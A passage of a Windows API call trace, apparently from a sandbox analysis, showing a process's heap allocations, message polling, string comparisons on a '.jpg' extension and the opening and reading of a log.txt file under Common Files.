hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.790] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.790] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0191.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.791] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0191.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0191.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0191.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0191.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.793] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.793] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0191.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.795] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.796] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x907778 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0191.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0191.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.799] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.799] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.799] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0191.799] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.799] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.800] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0191.800] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x32b7, lpOverlapped=0x0) returned 1 [0191.800] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0191.800] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x32b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.800] 